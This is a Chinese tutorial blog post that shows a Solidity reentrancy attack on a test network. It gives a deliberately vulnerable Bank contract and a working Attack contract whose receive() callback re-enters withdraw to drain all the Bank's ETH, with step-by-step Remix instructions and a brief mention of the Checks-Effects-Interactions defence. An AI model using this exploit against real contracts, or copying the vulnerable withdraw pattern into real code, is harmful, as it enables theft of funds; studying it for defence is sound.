solidity 重入攻击测试

任何从合约 A 到合约 B 的交互以及任何从合约 A 到合约 B 的以太币Ether 的转移，都会将控制权交给合约 B。这使得合约 B 能够在交互结束前回调 A 中的代码。

在合约中运用转账调用call方法，可以消耗完所有的gas，而send和transfer只消耗2300。

为了便面重入，可以使用“检查-生效-交互”（Checks-Effects-Interactions）模式，或者加锁限制：

以下两个合约模拟了攻击者和受害者，通过重入攻击，获得了受害者所有的ETH。

pragma solidity >=0.7.0 <=0.8.0;
// SPDX-License-Identifier: MITcontract Bank {uint256 constant public ethLower = 1 ether;uint256 constant public ethUpper = 5 ether;mapping(address => uint256) balances;event depositEth(address sender,uint256 value);event withdrawEth(address sender,uint256 value);function depositEther() payable public{require(msg.value >= ethLower);require(msg.value <= ethUpper);balances[msg.sender] += msg.value;emit depositEth(msg.sender,msg.value);}function withdraw(uint256 amount) public{require(balances[msg.sender] >= amount);msg.sender.call{value: amount}("");balances[msg.sender] -= amount;emit withdrawEth(msg.sender,amount);}function withdraw() public {msg.sender.transfer(address(this).balance);}function getBalance(address addr) public view returns(uint256){return balances[addr];}function getTotal() public view returns(uint256){return address(this).balance;}}

pragma solidity >=0.7.0 <=0.8.0;
// SPDX-License-Identifier: MITinterface IRC20 {function depositEther() external payable;function withdraw(uint256 amount) external;function getBalance(address addr) external view returns(uint256);}contract Attack {address constant private addr = 0x78E74b14512f2f9d3C26aeE24d902Fef10F46d72;IRC20 private tract;event withdrawEth(address sender,uint256 value);constructor(){tract = IRC20(addr);}function getBalance() public view returns(uint){return address(this).balance;}function despoit() public payable{tract.depositEther{value:2 ether}();tract.withdraw(1 ether);}function withdraw() public {msg.sender.transfer(address(this).balance);}receive() external payable {uint256 amount = tract.getBalance(address(this));emit withdrawEth(msg.sender,amount);if( amount >= 1 ether ){tract.withdraw(1 ether);}}}

步骤：1. 通过remix创建合约bank(B)和attack（C）.

2.通过地址A向合约B 2次转账10ETH。此时合约B余额为10ETH。

3.通过地址A向合约C转账2ETH。此时合约C余额为2ETH。

4.通过合约C方法，往合约B中存入2ETH，触发提现，提取B全部的ETH。这个步骤gaslimit要给足，不然会失败。

5，B和C合约所有测试ETH都可以通过提现方法提出来。

参考：

https://learnblockchain.cn/docs/solidity/security-considerations.html#re-entance

solidity 重入攻击测试相关推荐

Solidity重入攻击深入理解
始于一份样例代码下面是样例合约的完整代码: pragma solidity ^0.4.23;contract babybank {mapping(address => uint) public ...
区块链的安全问题（乱序时间戳，重入攻击）
原文链接:郭老师的备课资料在引入比特币等加密货币时,一个经常提及的概念是支撑着这些加密货币的底层框架--区块链协议非常地安全可靠.各种加密算法保证了区块链的正常运行,区块链中的信息不可篡改.不能删除 ...
创宇区块链｜Rari Capital 遭受重入攻击，损失超 8000 万美元
前言北京时间 2022 年 4 月 30 日,知道创宇区块链安全实验室监测到以太坊上 feiprotocol 和 RariCapital 协议中的多个池子遭到重入攻击,导致损失超 8000 万美元 ...
区块链骇客第一讲:重入攻击
本篇文章开启区块链骇客专栏的第一讲,让我决心开写本专栏的首要原因是对未来的职业选择有了一个确定的规划. 日后的更新频率将会不小于等于每周一讲,欢迎各位读者监督和指正,一起学习一同进步!
创宇区块链 | 黑客利用重入漏洞盗币，Ola_finance 攻击事件分析
1. 前言北京时间 2022 年 3 月 31 日,知道创宇区块链安全实验室监测到借贷平台 Ola_finance 遭到重入攻击,黑客窃取 216964.18 USDC.507216.68 BUS ...
Java 中可重入锁、不可重入锁的测试
可重入锁指在同一个线程在外层方法获取锁的时候,进入内层方法会自动获取锁. 为了避免死锁的发生,JDK 中基本都是可重入锁. 下面我们来测试一下 synchronized 和 java.util.c ...
详解ReentrantLock为什么是可重入锁
1 缘起有一次,公司有人在面试,路过时,听到面试官问到了锁, 让面试者聊一聊用到的锁, 我此时,也是心里一震, 我用过哪些锁?为什么使用? 搜索了好一会儿,哈哈哈,我就是这么菜. 只学习过synch ...
可重入锁与非可重入锁
文章目录锁的分类什么是可重入锁测试lock 锁的可重入性不可重入锁锁的分类什么是可重入锁可重入锁又名递归锁,是指在同一个线程在外层方法获取锁的时候,再进入该线程的内层方法会自动获取锁(前 ...
测试Lock锁-可重入锁（Java）
测试Lock锁-可重入锁(Java) package src.thread;import java.util.concurrent.locks.ReentrantLock;public class T ...
(转)编写可重入和线程安全的代码(Writing Reentrant and Thread-Safe Code)
Writing Reentrant and Thread-Safe Code 原文地址: http:/unet.univie.ac.at/aix/aixprggd/genprogc/writing_r ...

solidity 重入攻击测试

solidity 重入攻击测试相关推荐

最新文章

热门文章